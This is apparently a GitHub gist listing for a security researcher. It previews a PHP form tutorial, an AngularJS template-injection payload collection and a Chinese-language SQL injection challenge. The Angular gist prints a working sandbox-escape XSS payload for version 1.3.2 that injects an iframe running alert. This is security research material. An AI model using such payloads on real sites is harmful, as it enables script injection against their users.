Skip to content

Instantly share code, notes, and snippets.

View aszx87410's full-sized avatar

Huli aszx87410

2k followers · 20 following
View GitHub Profile
@aszx87410
aszx87410 / php_form_submit.md
Created October 5, 2020 15:11 — forked from jesperorb/php_form_submit.md
PHP form submitting with fetch + async/await

PHP Form submitting

If we have the following structure in our application:

  • 📁 application_folder_name
    • 📄 index.php
    • 📄 handle_form.php
    • 📄 main.js

And we fill our index.php with the following content just to get a basic website with a form working. You should be able to run this through a php-server of your choice.

@aszx87410
aszx87410 / AngularTI.md
Created August 18, 2021 07:43 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@aszx87410
aszx87410 / sqlinjection.md
Last active January 11, 2022 13:45
SQL injection

SQL injection 小挑戰

說明

底下是兩個從實際案例修改而成的 SQL injection 小挑戰,很明顯有 SQL injection 的漏洞
要拿到 flag 不難,但我覺得有趣的是「要如何利用最少的 request,得到最多的資訊」
舉例來說,boolean based 一次只能拿到 true 或 false,資訊量就偏少
如果能直接 union 然後把結果 dump 出來,資訊量就大很多

因此這個挑戰的目的在於如何用最少的 request,得到最多的資訊量